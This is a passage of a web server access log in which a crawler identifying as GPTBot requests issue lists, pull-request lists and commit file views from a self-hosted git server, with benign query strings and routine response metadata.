[Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2ftest_run.bat" [Client 74.7.227.38] [Length 21922] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:19:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fbuild_exe.bat" [Client 74.7.227.38] [Length 23135] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:19:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11306] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13945] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72700] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72701] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123724] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72052] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71664] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122745] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123728] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72049] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72699] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:22:31 +0000] - 200 200 - GET https 